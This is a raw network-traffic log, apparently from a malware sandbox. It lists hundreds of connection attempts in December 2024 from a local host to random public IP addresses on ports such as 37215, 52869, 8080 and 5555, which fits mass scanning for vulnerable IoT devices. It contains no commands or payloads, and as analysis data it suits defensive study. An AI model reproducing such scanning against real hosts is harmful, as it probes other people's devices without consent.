                                                              Dec 11, 2024 00:42:56.086808920 CET5104280192.168.2.23111.236.18.200
                                                              Dec 11, 2024 00:42:56.099773884 CET5557249152192.168.2.23210.164.84.185
                                                              Dec 11, 2024 00:42:56.100223064 CET3932880192.168.2.23213.56.209.193
                                                              Dec 11, 2024 00:42:56.100671053 CET3585280192.168.2.233.179.237.117
                                                              Dec 11, 2024 00:42:56.101118088 CET526788080192.168.2.2378.160.226.219
                                                              Dec 11, 2024 00:42:56.101571083 CET4630649152192.168.2.23167.83.233.35
                                                              Dec 11, 2024 00:42:56.102039099 CET4450237215192.168.2.23218.232.108.182
                                                              Dec 11, 2024 00:42:56.102488041 CET467147574192.168.2.2312.69.195.226
                                                              Dec 11, 2024 00:42:56.102935076 CET3764437215192.168.2.23206.139.158.36
                                                              Dec 11, 2024 00:42:56.103391886 CET3762252869192.168.2.2374.94.9.126
                                                              Dec 11, 2024 00:42:56.103847027 CET524108080192.168.2.238.202.67.229
                                                              Dec 11, 2024 00:42:56.104295969 CET3682252869192.168.2.2379.79.71.152
                                                              Dec 11, 2024 00:42:56.104733944 CET452508080192.168.2.2345.22.47.103
                                                              Dec 11, 2024 00:42:56.105206013 CET3696080192.168.2.23211.174.66.239
                                                              Dec 11, 2024 00:42:56.105645895 CET530228080192.168.2.23117.238.33.98
                                                              Dec 11, 2024 00:42:56.106093884 CET4780249152192.168.2.2315.233.37.150
                                                              Dec 11, 2024 00:42:56.106548071 CET383608080192.168.2.23140.124.226.188
                                                              Dec 11, 2024 00:42:56.106985092 CET582928080192.168.2.2334.184.126.212
                                                              Dec 11, 2024 00:42:56.107445002 CET5826480192.168.2.23131.241.38.205
                                                              Dec 11, 2024 00:42:56.107880116 CET5138280192.168.2.23113.213.140.110
                                                              Dec 11, 2024 00:42:56.108326912 CET538048443192.168.2.235.143.69.122
                                                              Dec 11, 2024 00:42:56.108779907 CET3529480192.168.2.23148.33.17.220
                                                              Dec 11, 2024 00:42:56.109236956 CET431025555192.168.2.2373.249.134.188
                                                              Dec 11, 2024 00:42:56.109688044 CET462388080192.168.2.23174.204.37.155
                                                              Dec 11, 2024 00:42:56.110138893 CET546588080192.168.2.23162.35.226.90
                                                              Dec 11, 2024 00:42:56.110594034 CET4232080192.168.2.2384.150.50.209
                                                              Dec 11, 2024 00:42:56.111063957 CET3720280192.168.2.23216.199.223.139
                                                              Dec 11, 2024 00:42:56.111515045 CET367868080192.168.2.23114.214.178.160
                                                              Dec 11, 2024 00:42:56.112008095 CET3305037215192.168.2.2353.31.107.240
                                                              Dec 11, 2024 00:42:56.112474918 CET4441652869192.168.2.23113.8.22.97
                                                              Dec 11, 2024 00:42:56.112945080 CET5511237215192.168.2.2317.238.190.54
                                                              Dec 11, 2024 00:42:56.113415003 CET5422652869192.168.2.2342.186.151.84
                                                              Dec 11, 2024 00:42:56.113876104 CET5951080192.168.2.23142.96.19.192
                                                              Dec 11, 2024 00:42:56.114346027 CET4121480192.168.2.2396.205.70.202
                                                              Dec 11, 2024 00:42:56.114825010 CET4333837215192.168.2.2353.188.136.82
                                                              Dec 11, 2024 00:42:56.115323067 CET453405555192.168.2.23110.161.89.185
                                                              Dec 11, 2024 00:42:56.115766048 CET6074652869192.168.2.2336.77.84.33
                                                              Dec 11, 2024 00:42:56.116220951 CET342768443192.168.2.2395.176.250.113
                                                              Dec 11, 2024 00:42:56.116683006 CET4401880192.168.2.2347.80.200.95
                                                              Dec 11, 2024 00:42:56.117150068 CET5506237215192.168.2.2337.215.196.232
                                                              Dec 11, 2024 00:42:56.117597103 CET3603237215192.168.2.2397.164.5.45
                                                              Dec 11, 2024 00:42:56.118050098 CET4520080192.168.2.2362.103.171.28
                                                              Dec 11, 2024 00:42:56.118510962 CET5311280192.168.2.2328.102.126.49
                                                              Dec 11, 2024 00:42:56.118948936 CET605128080192.168.2.23103.113.64.117
                                                              Dec 11, 2024 00:42:56.119401932 CET5791681192.168.2.2389.177.177.66
                                                              Dec 11, 2024 00:42:56.119849920 CET429848443192.168.2.236.237.128.43
                                                              Dec 11, 2024 00:42:56.120284081 CET6004480192.168.2.2393.98.197.179
                                                              Dec 11, 2024 00:42:56.120740891 CET473628080192.168.2.2393.52.53.0
                                                              Dec 11, 2024 00:42:56.121187925 CET587048080192.168.2.23134.145.254.175
                                                              Dec 11, 2024 00:42:56.181597948 CET808048458100.184.144.114192.168.2.23
                                                              Dec 11, 2024 00:42:56.181617975 CET8041714113.229.7.213192.168.2.23
                                                              Dec 11, 2024 00:42:56.181626081 CET528694290684.2.80.57192.168.2.23
                                                              Dec 11, 2024 00:42:56.181653976 CET484588080192.168.2.23100.184.144.114
                                                              Dec 11, 2024 00:42:56.181658983 CET4171480192.168.2.23113.229.7.213
                                                              Dec 11, 2024 00:42:56.181659937 CET4290652869192.168.2.2384.2.80.57
                                                              Dec 11, 2024 00:42:56.181833029 CET804044021.244.144.86192.168.2.23
                                                              Dec 11, 2024 00:42:56.181843042 CET808050400216.18.254.161192.168.2.23
                                                              Dec 11, 2024 00:42:56.181850910 CET757454856167.151.164.41192.168.2.23
                                                              Dec 11, 2024 00:42:56.181859970 CET80804181287.116.84.152192.168.2.23
                                                              Dec 11, 2024 00:42:56.181864023 CET5286947372162.33.207.205192.168.2.23
                                                              Dec 11, 2024 00:42:56.181866884 CET4044080192.168.2.2321.244.144.86
                                                              Dec 11, 2024 00:42:56.181868076 CET803714260.29.245.149192.168.2.23
                                                              Dec 11, 2024 00:42:56.181875944 CET504008080192.168.2.23216.18.254.161
                                                              Dec 11, 2024 00:42:56.181876898 CET5286956902194.213.146.39192.168.2.23
                                                              Dec 11, 2024 00:42:56.181885958 CET80806074828.144.199.55192.168.2.23
                                                              Dec 11, 2024 00:42:56.181895971 CET8055318222.76.197.121192.168.2.23
                                                              Dec 11, 2024 00:42:56.181896925 CET548567574192.168.2.23167.151.164.41
                                                              Dec 11, 2024 00:42:56.181896925 CET418128080192.168.2.2387.116.84.152
                                                              Dec 11, 2024 00:42:56.181900024 CET4737252869192.168.2.23162.33.207.205
                                                              Dec 11, 2024 00:42:56.181900978 CET3714280192.168.2.2360.29.245.149
                                                              Dec 11, 2024 00:42:56.181904078 CET808051548182.98.49.24192.168.2.23
                                                              Dec 11, 2024 00:42:56.181909084 CET5690252869192.168.2.23194.213.146.39
                                                              Dec 11, 2024 00:42:56.181912899 CET808051398210.181.40.142192.168.2.23
                                                              Dec 11, 2024 00:42:56.181921959 CET607488080192.168.2.2328.144.199.55
                                                              Dec 11, 2024 00:42:56.181921959 CET804553642.242.241.33192.168.2.23
                                                              Dec 11, 2024 00:42:56.181930065 CET808039232106.44.250.26192.168.2.23
                                                              Dec 11, 2024 00:42:56.181931973 CET5531880192.168.2.23222.76.197.121
                                                              Dec 11, 2024 00:42:56.181935072 CET515488080192.168.2.23182.98.49.24
                                                              Dec 11, 2024 00:42:56.181940079 CET3721558104121.136.2.49192.168.2.23
                                                              Dec 11, 2024 00:42:56.181951046 CET808036224124.74.74.114192.168.2.23
                                                              Dec 11, 2024 00:42:56.181955099 CET513988080192.168.2.23210.181.40.142
                                                              Dec 11, 2024 00:42:56.181955099 CET392328080192.168.2.23106.44.250.26
                                                              Dec 11, 2024 00:42:56.181958914 CET84433821838.122.193.152192.168.2.23
                                                              Dec 11, 2024 00:42:56.181961060 CET4553680192.168.2.2342.242.241.33
                                                              Dec 11, 2024 00:42:56.181967020 CET8047786210.135.157.10192.168.2.23
                                                              Dec 11, 2024 00:42:56.181969881 CET5810437215192.168.2.23121.136.2.49
                                                              Dec 11, 2024 00:42:56.181976080 CET8050042137.151.78.143192.168.2.23
                                                              Dec 11, 2024 00:42:56.181983948 CET382188443192.168.2.2338.122.193.152
                                                              Dec 11, 2024 00:42:56.181983948 CET362248080192.168.2.23124.74.74.114
                                                              Dec 11, 2024 00:42:56.181987047 CET8054236136.34.183.2192.168.2.23
                                                              Dec 11, 2024 00:42:56.182009935 CET4778680192.168.2.23210.135.157.10
                                                              Dec 11, 2024 00:42:56.182009935 CET5004280192.168.2.23137.151.78.143
                                                              Dec 11, 2024 00:42:56.182027102 CET5423680192.168.2.23136.34.183.2
                                                              Dec 11, 2024 00:42:56.182240963 CET815671285.78.252.113192.168.2.23
                                                              Dec 11, 2024 00:42:56.182250023 CET372154153626.83.38.216192.168.2.23
                                                              Dec 11, 2024 00:42:56.182255030 CET84435777635.36.155.170192.168.2.23
                                                              Dec 11, 2024 00:42:56.182270050 CET8047128167.210.102.18192.168.2.23
                                                              Dec 11, 2024 00:42:56.182279110 CET808053188118.35.168.154192.168.2.23
                                                              Dec 11, 2024 00:42:56.182286024 CET5671281192.168.2.2385.78.252.113
                                                              Dec 11, 2024 00:42:56.182288885 CET4153637215192.168.2.2326.83.38.216
                                                              Dec 11, 2024 00:42:56.182288885 CET577768443192.168.2.2335.36.155.170
                                                              Dec 11, 2024 00:42:56.182306051 CET4712880192.168.2.23167.210.102.18
                                                              Dec 11, 2024 00:42:56.182306051 CET531888080192.168.2.23118.35.168.154
                                                              Dec 11, 2024 00:42:56.182368040 CET8053258163.152.100.25192.168.2.23
                                                              Dec 11, 2024 00:42:56.182410002 CET5325880192.168.2.23163.152.100.25
                                                              Dec 11, 2024 00:42:56.182434082 CET757439032134.32.128.235192.168.2.23
                                                              Dec 11, 2024 00:42:56.182442904 CET4915250214125.133.16.27192.168.2.23
                                                              Dec 11, 2024 00:42:56.182465076 CET8039016123.244.144.208192.168.2.23
                                                              Dec 11, 2024 00:42:56.182475090 CET8053766161.185.149.32192.168.2.23
                                                              Dec 11, 2024 00:42:56.182475090 CET390327574192.168.2.23134.32.128.235
                                                              Dec 11, 2024 00:42:56.182475090 CET5021449152192.168.2.23125.133.16.27
                                                              Dec 11, 2024 00:42:56.182495117 CET3901680192.168.2.23123.244.144.208
                                                              Dec 11, 2024 00:42:56.182502985 CET5376680192.168.2.23161.185.149.32
                                                              Dec 11, 2024 00:42:56.182564974 CET3721544088158.219.39.254192.168.2.23
                                                              Dec 11, 2024 00:42:56.182580948 CET8080525285.244.147.234192.168.2.23
                                                              Dec 11, 2024 00:42:56.182609081 CET4408837215192.168.2.23158.219.39.254
                                                              Dec 11, 2024 00:42:56.182609081 CET525288080192.168.2.235.244.147.234
                                                              Dec 11, 2024 00:42:56.182634115 CET804215471.44.225.112192.168.2.23
                                                              Dec 11, 2024 00:42:56.182673931 CET4215480192.168.2.2371.44.225.112
                                                              Dec 11, 2024 00:42:56.182683945 CET528695897279.39.229.25192.168.2.23
                                                              Dec 11, 2024 00:42:56.182718992 CET5897252869192.168.2.2379.39.229.25
                                                              Dec 11, 2024 00:42:56.182719946 CET528695928431.20.181.48192.168.2.23
                                                              Dec 11, 2024 00:42:56.182732105 CET80803503861.237.100.81192.168.2.23
                                                              Dec 11, 2024 00:42:56.182760954 CET5928452869192.168.2.2331.20.181.48
                                                              Dec 11, 2024 00:42:56.182764053 CET350388080192.168.2.2361.237.100.81
                                                              Dec 11, 2024 00:42:56.182857990 CET55553387048.214.85.13192.168.2.23
                                                              Dec 11, 2024 00:42:56.182867050 CET5286945240161.199.124.145192.168.2.23
                                                              Dec 11, 2024 00:42:56.182873964 CET808041436190.249.69.106192.168.2.23
                                                              Dec 11, 2024 00:42:56.182883024 CET805488023.173.106.27192.168.2.23
                                                              Dec 11, 2024 00:42:56.182893038 CET8049094192.135.140.135192.168.2.23
                                                              Dec 11, 2024 00:42:56.182899952 CET808054774204.81.207.188192.168.2.23
                                                              Dec 11, 2024 00:42:56.182905912 CET4524052869192.168.2.23161.199.124.145
                                                              Dec 11, 2024 00:42:56.182907104 CET338705555192.168.2.2348.214.85.13
                                                              Dec 11, 2024 00:42:56.182929993 CET547748080192.168.2.23204.81.207.188
                                                              Dec 11, 2024 00:42:56.182931900 CET5488080192.168.2.2323.173.106.27
                                                              Dec 11, 2024 00:42:56.182933092 CET414368080192.168.2.23190.249.69.106
                                                              Dec 11, 2024 00:42:56.182938099 CET4909480192.168.2.23192.135.140.135
                                                              Dec 11, 2024 00:42:56.183630943 CET8060168220.15.89.10192.168.2.23
                                                              Dec 11, 2024 00:42:56.183646917 CET3721542514142.31.67.244192.168.2.23
                                                              Dec 11, 2024 00:42:56.183665991 CET757438010221.42.76.51192.168.2.23
                                                              Dec 11, 2024 00:42:56.183670998 CET6016880192.168.2.23220.15.89.10
                                                              Dec 11, 2024 00:42:56.183680058 CET4251437215192.168.2.23142.31.67.244
                                                              Dec 11, 2024 00:42:56.183705091 CET491524401279.10.209.34192.168.2.23
                                                              Dec 11, 2024 00:42:56.183711052 CET380107574192.168.2.23221.42.76.51
                                                              Dec 11, 2024 00:42:56.183715105 CET80552649.58.179.109192.168.2.23
                                                              Dec 11, 2024 00:42:56.183725119 CET805820229.105.29.159192.168.2.23
                                                              Dec 11, 2024 00:42:56.183732033 CET757446432203.29.198.208192.168.2.23
                                                              Dec 11, 2024 00:42:56.183753014 CET4401249152192.168.2.2379.10.209.34
                                                              Dec 11, 2024 00:42:56.183763027 CET464327574192.168.2.23203.29.198.208
                                                              Dec 11, 2024 00:42:56.183768034 CET5526480192.168.2.239.58.179.109
                                                              Dec 11, 2024 00:42:56.183769941 CET5820280192.168.2.2329.105.29.159
                                                              Dec 11, 2024 00:42:56.183809996 CET804574473.34.189.202192.168.2.23
                                                              Dec 11, 2024 00:42:56.183819056 CET8143002120.144.248.245192.168.2.23
                                                              Dec 11, 2024 00:42:56.183828115 CET808051378113.145.142.202192.168.2.23
                                                              Dec 11, 2024 00:42:56.183836937 CET8153212150.246.65.115192.168.2.23
                                                              Dec 11, 2024 00:42:56.183855057 CET4574480192.168.2.2373.34.189.202
                                                              Dec 11, 2024 00:42:56.183855057 CET513788080192.168.2.23113.145.142.202
                                                              Dec 11, 2024 00:42:56.183857918 CET4300281192.168.2.23120.144.248.245
                                                              Dec 11, 2024 00:42:56.183866024 CET5321281192.168.2.23150.246.65.115
                                                              Dec 11, 2024 00:42:56.183871984 CET8043836125.163.236.226192.168.2.23
                                                              Dec 11, 2024 00:42:56.183882952 CET3721560742149.241.161.180192.168.2.23
                                                              Dec 11, 2024 00:42:56.183891058 CET808060422184.96.7.28192.168.2.23
                                                              Dec 11, 2024 00:42:56.183898926 CET8080406309.109.75.127192.168.2.23
                                                              Dec 11, 2024 00:42:56.183902979 CET757447894206.142.193.152192.168.2.23
                                                              Dec 11, 2024 00:42:56.183917046 CET4383680192.168.2.23125.163.236.226
                                                              Dec 11, 2024 00:42:56.183917046 CET6074237215192.168.2.23149.241.161.180
                                                              Dec 11, 2024 00:42:56.183933020 CET406308080192.168.2.239.109.75.127
                                                              Dec 11, 2024 00:42:56.183933020 CET604228080192.168.2.23184.96.7.28
                                                              Dec 11, 2024 00:42:56.183953047 CET80805642447.30.123.212192.168.2.23
                                                              Dec 11, 2024 00:42:56.183953047 CET478947574192.168.2.23206.142.193.152
                                                              Dec 11, 2024 00:42:56.183963060 CET55555894087.120.225.117192.168.2.23
                                                              Dec 11, 2024 00:42:56.183971882 CET844333058140.81.126.115192.168.2.23
                                                              Dec 11, 2024 00:42:56.183980942 CET555544964153.95.193.121192.168.2.23
                                                              Dec 11, 2024 00:42:56.183989048 CET803863256.53.8.6192.168.2.23
                                                              Dec 11, 2024 00:42:56.183998108 CET589405555192.168.2.2387.120.225.117
                                                              Dec 11, 2024 00:42:56.183999062 CET813317291.53.41.217192.168.2.23
                                                              Dec 11, 2024 00:42:56.184005022 CET564248080192.168.2.2347.30.123.212
                                                              Dec 11, 2024 00:42:56.184010029 CET330588443192.168.2.23140.81.126.115
                                                              Dec 11, 2024 00:42:56.184010029 CET449645555192.168.2.23153.95.193.121
                                                              Dec 11, 2024 00:42:56.184024096 CET3863280192.168.2.2356.53.8.6
                                                              Dec 11, 2024 00:42:56.184029102 CET3317281192.168.2.2391.53.41.217
                                                              Dec 11, 2024 00:42:56.184514046 CET8034024193.94.36.43192.168.2.23
                                                              Dec 11, 2024 00:42:56.184523106 CET84433876018.65.35.200192.168.2.23
                                                              Dec 11, 2024 00:42:56.184533119 CET815589231.225.239.95192.168.2.23
                                                              Dec 11, 2024 00:42:56.184540987 CET491524821893.31.4.225192.168.2.23
                                                              Dec 11, 2024 00:42:56.184545040 CET808043226206.130.7.22192.168.2.23
                                                              Dec 11, 2024 00:42:56.184552908 CET387608443192.168.2.2318.65.35.200
                                                              Dec 11, 2024 00:42:56.184552908 CET8039352222.38.112.228192.168.2.23
                                                              Dec 11, 2024 00:42:56.184555054 CET3402480192.168.2.23193.94.36.43
                                                              Dec 11, 2024 00:42:56.184561968 CET844344030137.27.133.90192.168.2.23
                                                              Dec 11, 2024 00:42:56.184571028 CET8045400203.2.27.219192.168.2.23
                                                              Dec 11, 2024 00:42:56.184573889 CET432268080192.168.2.23206.130.7.22
                                                              Dec 11, 2024 00:42:56.184575081 CET8054806143.186.21.173192.168.2.23
                                                              Dec 11, 2024 00:42:56.184582949 CET372153855013.9.189.7192.168.2.23
                                                              Dec 11, 2024 00:42:56.184583902 CET5589281192.168.2.2331.225.239.95
                                                              Dec 11, 2024 00:42:56.184585094 CET4821849152192.168.2.2393.31.4.225
                                                              Dec 11, 2024 00:42:56.184591055 CET3935280192.168.2.23222.38.112.228
                                                              Dec 11, 2024 00:42:56.184591055 CET805033283.96.191.136192.168.2.23
                                                              Dec 11, 2024 00:42:56.184601068 CET555548516186.251.44.209192.168.2.23
                                                              Dec 11, 2024 00:42:56.184609890 CET4915242356166.192.145.39192.168.2.23
                                                              Dec 11, 2024 00:42:56.184609890 CET4540080192.168.2.23203.2.27.219
                                                              Dec 11, 2024 00:42:56.184609890 CET3855037215192.168.2.2313.9.189.7
                                                              Dec 11, 2024 00:42:56.184611082 CET440308443192.168.2.23137.27.133.90
                                                              Dec 11, 2024 00:42:56.184611082 CET5480680192.168.2.23143.186.21.173
                                                              Dec 11, 2024 00:42:56.184618950 CET808038568211.70.46.51192.168.2.23
                                                              Dec 11, 2024 00:42:56.184628010 CET844353920196.115.212.171192.168.2.23
                                                              Dec 11, 2024 00:42:56.184628010 CET5033280192.168.2.2383.96.191.136
                                                              Dec 11, 2024 00:42:56.184633970 CET485165555192.168.2.23186.251.44.209
                                                              Dec 11, 2024 00:42:56.184634924 CET4235649152192.168.2.23166.192.145.39
                                                              Dec 11, 2024 00:42:56.184636116 CET808055502187.147.83.5192.168.2.23
                                                              Dec 11, 2024 00:42:56.184643984 CET804299414.232.148.193192.168.2.23
                                                              Dec 11, 2024 00:42:56.184652090 CET808053384162.198.43.227192.168.2.23
                                                              Dec 11, 2024 00:42:56.184655905 CET539208443192.168.2.23196.115.212.171
                                                              Dec 11, 2024 00:42:56.184657097 CET8055738154.140.14.6192.168.2.23
                                                              Dec 11, 2024 00:42:56.184658051 CET385688080192.168.2.23211.70.46.51
                                                              Dec 11, 2024 00:42:56.184662104 CET8054192186.173.246.164192.168.2.23
                                                              Dec 11, 2024 00:42:56.184664011 CET555028080192.168.2.23187.147.83.5
                                                              Dec 11, 2024 00:42:56.184672117 CET8160138118.30.132.235192.168.2.23
                                                              Dec 11, 2024 00:42:56.184676886 CET4299480192.168.2.2314.232.148.193
                                                              Dec 11, 2024 00:42:56.184679985 CET805933634.57.137.153192.168.2.23
                                                              Dec 11, 2024 00:42:56.184685946 CET533848080192.168.2.23162.198.43.227
                                                              Dec 11, 2024 00:42:56.184686899 CET5573880192.168.2.23154.140.14.6
                                                              Dec 11, 2024 00:42:56.184695005 CET5419280192.168.2.23186.173.246.164
                                                              Dec 11, 2024 00:42:56.184705019 CET6013881192.168.2.23118.30.132.235
                                                              Dec 11, 2024 00:42:56.184717894 CET5933680192.168.2.2334.57.137.153
                                                              Dec 11, 2024 00:42:56.185242891 CET844356074139.77.12.175192.168.2.23
                                                              Dec 11, 2024 00:42:56.185256958 CET555552520140.9.134.133192.168.2.23
                                                              Dec 11, 2024 00:42:56.185272932 CET804867640.223.116.254192.168.2.23
                                                              Dec 11, 2024 00:42:56.185281038 CET560748443192.168.2.23139.77.12.175
                                                              Dec 11, 2024 00:42:56.185281038 CET803406616.29.234.244192.168.2.23
                                                              Dec 11, 2024 00:42:56.185290098 CET4915254080110.142.198.158192.168.2.23
                                                              Dec 11, 2024 00:42:56.185291052 CET525205555192.168.2.23140.9.134.133
                                                              Dec 11, 2024 00:42:56.185317993 CET4867680192.168.2.2340.223.116.254
                                                              Dec 11, 2024 00:42:56.185317993 CET5408049152192.168.2.23110.142.198.158
                                                              Dec 11, 2024 00:42:56.185319901 CET3406680192.168.2.2316.29.234.244
                                                              Dec 11, 2024 00:42:56.185340881 CET84433489663.44.16.237192.168.2.23
                                                              Dec 11, 2024 00:42:56.185348988 CET8153648162.83.75.110192.168.2.23
                                                              Dec 11, 2024 00:42:56.185358047 CET8058450148.225.57.169192.168.2.23
                                                              Dec 11, 2024 00:42:56.185370922 CET3721558484141.80.218.97192.168.2.23
                                                              Dec 11, 2024 00:42:56.185378075 CET348968443192.168.2.2363.44.16.237
                                                              Dec 11, 2024 00:42:56.185379028 CET5364881192.168.2.23162.83.75.110
                                                              Dec 11, 2024 00:42:56.185380936 CET372154188862.217.115.182192.168.2.23
                                                              Dec 11, 2024 00:42:56.185394049 CET5845080192.168.2.23148.225.57.169
                                                              Dec 11, 2024 00:42:56.185410976 CET5848437215192.168.2.23141.80.218.97
                                                              Dec 11, 2024 00:42:56.185417891 CET4188837215192.168.2.2362.217.115.182
                                                              Dec 11, 2024 00:42:56.185420036 CET491524540450.91.199.9192.168.2.23
                                                              Dec 11, 2024 00:42:56.185429096 CET808041280215.50.246.23192.168.2.23
                                                              Dec 11, 2024 00:42:56.185458899 CET4540449152192.168.2.2350.91.199.9
                                                              Dec 11, 2024 00:42:56.185460091 CET412808080192.168.2.23215.50.246.23
                                                              Dec 11, 2024 00:42:56.185517073 CET372155540289.213.177.170192.168.2.23
                                                              Dec 11, 2024 00:42:56.185559034 CET5540237215192.168.2.2389.213.177.170
                                                              Dec 11, 2024 00:42:56.185619116 CET8041766179.117.226.194192.168.2.23
                                                              Dec 11, 2024 00:42:56.185655117 CET4176680192.168.2.23179.117.226.194
                                                              Dec 11, 2024 00:42:56.185683012 CET55554297490.197.2.27192.168.2.23
                                                              Dec 11, 2024 00:42:56.185718060 CET429745555192.168.2.2390.197.2.27
                                                              Dec 11, 2024 00:42:56.185719967 CET8056246152.117.85.253192.168.2.23
                                                              Dec 11, 2024 00:42:56.185736895 CET80805096423.113.105.209192.168.2.23
                                                              Dec 11, 2024 00:42:56.185755968 CET5624680192.168.2.23152.117.85.253
                                                              Dec 11, 2024 00:42:56.185779095 CET509648080192.168.2.2323.113.105.209
                                                              Dec 11, 2024 00:42:56.185784101 CET49152462529.70.45.227192.168.2.23
                                                              Dec 11, 2024 00:42:56.185792923 CET4915243262113.146.56.79192.168.2.23
                                                              Dec 11, 2024 00:42:56.185805082 CET4915242856108.85.179.160192.168.2.23
                                                              Dec 11, 2024 00:42:56.185822010 CET4326249152192.168.2.23113.146.56.79
                                                              Dec 11, 2024 00:42:56.185825109 CET4625249152192.168.2.239.70.45.227
                                                              Dec 11, 2024 00:42:56.185847044 CET4285649152192.168.2.23108.85.179.160
                                                              Dec 11, 2024 00:42:56.185872078 CET808033938202.202.168.64192.168.2.23
                                                              Dec 11, 2024 00:42:56.185889006 CET844360024195.246.106.194192.168.2.23
                                                              Dec 11, 2024 00:42:56.185913086 CET339388080192.168.2.23202.202.168.64
                                                              Dec 11, 2024 00:42:56.185930967 CET600248443192.168.2.23195.246.106.194
                                                              Dec 11, 2024 00:42:56.186378002 CET491523731447.69.248.12192.168.2.23
                                                              Dec 11, 2024 00:42:56.186418056 CET3731449152192.168.2.2347.69.248.12
                                                              Dec 11, 2024 00:42:56.186450005 CET815413242.208.199.211192.168.2.23
                                                              Dec 11, 2024 00:42:56.186459064 CET8156900118.137.245.66192.168.2.23
                                                              Dec 11, 2024 00:42:56.186466932 CET757458324201.200.12.116192.168.2.23
                                                              Dec 11, 2024 00:42:56.186494112 CET5413281192.168.2.2342.208.199.211
                                                              Dec 11, 2024 00:42:56.186499119 CET5690081192.168.2.23118.137.245.66
                                                              Dec 11, 2024 00:42:56.186501980 CET3721544034164.98.152.87192.168.2.23
                                                              Dec 11, 2024 00:42:56.186502934 CET583247574192.168.2.23201.200.12.116
                                                              Dec 11, 2024 00:42:56.186511040 CET491525772865.131.166.130192.168.2.23
                                                              Dec 11, 2024 00:42:56.186518908 CET491525012632.170.33.253192.168.2.23
                                                              Dec 11, 2024 00:42:56.186532021 CET844343774124.13.202.21192.168.2.23
                                                              Dec 11, 2024 00:42:56.186542034 CET4403437215192.168.2.23164.98.152.87
                                                              Dec 11, 2024 00:42:56.186542034 CET5772849152192.168.2.2365.131.166.130
                                                              Dec 11, 2024 00:42:56.186542988 CET75745225845.27.188.99192.168.2.23
                                                              Dec 11, 2024 00:42:56.186546087 CET5012649152192.168.2.2332.170.33.253
                                                              Dec 11, 2024 00:42:56.186573982 CET808044056191.251.39.30192.168.2.23
                                                              Dec 11, 2024 00:42:56.186577082 CET437748443192.168.2.23124.13.202.21
                                                              Dec 11, 2024 00:42:56.186577082 CET522587574192.168.2.2345.27.188.99
                                                              Dec 11, 2024 00:42:56.186614990 CET80805234277.93.207.38192.168.2.23
                                                              Dec 11, 2024 00:42:56.186616898 CET440568080192.168.2.23191.251.39.30
                                                              Dec 11, 2024 00:42:56.186624050 CET555552166157.149.9.22192.168.2.23
                                                              Dec 11, 2024 00:42:56.186629057 CET55554613476.51.22.34192.168.2.23
                                                              Dec 11, 2024 00:42:56.186654091 CET8134002103.159.1.83192.168.2.23
                                                              Dec 11, 2024 00:42:56.186657906 CET523428080192.168.2.2377.93.207.38
                                                              Dec 11, 2024 00:42:56.186657906 CET521665555192.168.2.23157.149.9.22
                                                              Dec 11, 2024 00:42:56.186661959 CET808057208119.7.140.192192.168.2.23
                                                              Dec 11, 2024 00:42:56.186662912 CET461345555192.168.2.2376.51.22.34
                                                              Dec 11, 2024 00:42:56.186667919 CET555533290214.156.186.64192.168.2.23
                                                              Dec 11, 2024 00:42:56.186676979 CET8037392207.198.77.45192.168.2.23
                                                              Dec 11, 2024 00:42:56.186692953 CET3400281192.168.2.23103.159.1.83
                                                              Dec 11, 2024 00:42:56.186702013 CET572088080192.168.2.23119.7.140.192
                                                              Dec 11, 2024 00:42:56.186702967 CET332905555192.168.2.23214.156.186.64
                                                              Dec 11, 2024 00:42:56.186718941 CET3739280192.168.2.23207.198.77.45
                                                              Dec 11, 2024 00:42:56.186966896 CET80805776626.194.72.229192.168.2.23
                                                              Dec 11, 2024 00:42:56.186975956 CET55554765630.227.89.81192.168.2.23
                                                              Dec 11, 2024 00:42:56.186984062 CET808040996207.144.197.158192.168.2.23
                                                              Dec 11, 2024 00:42:56.186994076 CET7574450003.254.159.181192.168.2.23
                                                              Dec 11, 2024 00:42:56.187001944 CET3721547902215.149.25.71192.168.2.23
                                                              Dec 11, 2024 00:42:56.187007904 CET476565555192.168.2.2330.227.89.81
                                                              Dec 11, 2024 00:42:56.187011003 CET577668080192.168.2.2326.194.72.229
                                                              Dec 11, 2024 00:42:56.187021017 CET409968080192.168.2.23207.144.197.158
                                                              Dec 11, 2024 00:42:56.187026978 CET4790237215192.168.2.23215.149.25.71
                                                              Dec 11, 2024 00:42:56.187032938 CET450007574192.168.2.233.254.159.181
                                                              Dec 11, 2024 00:42:56.187175035 CET814138485.146.86.114192.168.2.23
                                                              Dec 11, 2024 00:42:56.187185049 CET808037224106.176.156.149192.168.2.23
                                                              Dec 11, 2024 00:42:56.187195063 CET8059380212.148.153.192192.168.2.23
                                                              Dec 11, 2024 00:42:56.187202930 CET757450500215.47.78.226192.168.2.23
                                                              Dec 11, 2024 00:42:56.187206984 CET804761038.95.163.205192.168.2.23
                                                              Dec 11, 2024 00:42:56.187215090 CET3721553088169.80.247.56192.168.2.23
                                                              Dec 11, 2024 00:42:56.187221050 CET4138481192.168.2.2385.146.86.114
                                                              Dec 11, 2024 00:42:56.187232018 CET505007574192.168.2.23215.47.78.226
                                                              Dec 11, 2024 00:42:56.187233925 CET372248080192.168.2.23106.176.156.149
                                                              Dec 11, 2024 00:42:56.187233925 CET5938080192.168.2.23212.148.153.192
                                                              Dec 11, 2024 00:42:56.187238932 CET4761080192.168.2.2338.95.163.205
                                                              Dec 11, 2024 00:42:56.187257051 CET5308837215192.168.2.23169.80.247.56
                                                              Dec 11, 2024 00:42:56.187263966 CET8136122214.127.32.13192.168.2.23
                                                              Dec 11, 2024 00:42:56.187283039 CET491525657865.143.55.175192.168.2.23
                                                              Dec 11, 2024 00:42:56.187290907 CET4915234192121.19.25.76192.168.2.23
                                                              Dec 11, 2024 00:42:56.187293053 CET3612281192.168.2.23214.127.32.13
                                                              Dec 11, 2024 00:42:56.187299967 CET84435181280.42.221.252192.168.2.23
                                                              Dec 11, 2024 00:42:56.187306881 CET5657849152192.168.2.2365.143.55.175
                                                              Dec 11, 2024 00:42:56.187308073 CET528694825851.217.212.91192.168.2.23
                                                              Dec 11, 2024 00:42:56.187319994 CET8054768171.2.151.108192.168.2.23
                                                              Dec 11, 2024 00:42:56.187328100 CET808046434183.37.186.197192.168.2.23
                                                              Dec 11, 2024 00:42:56.187329054 CET3419249152192.168.2.23121.19.25.76
                                                              Dec 11, 2024 00:42:56.187335968 CET4825852869192.168.2.2351.217.212.91
                                                              Dec 11, 2024 00:42:56.187336922 CET8037292149.210.29.201192.168.2.23
                                                              Dec 11, 2024 00:42:56.187338114 CET518128443192.168.2.2380.42.221.252
                                                              Dec 11, 2024 00:42:56.187346935 CET5476880192.168.2.23171.2.151.108
                                                              Dec 11, 2024 00:42:56.187347889 CET464348080192.168.2.23183.37.186.197
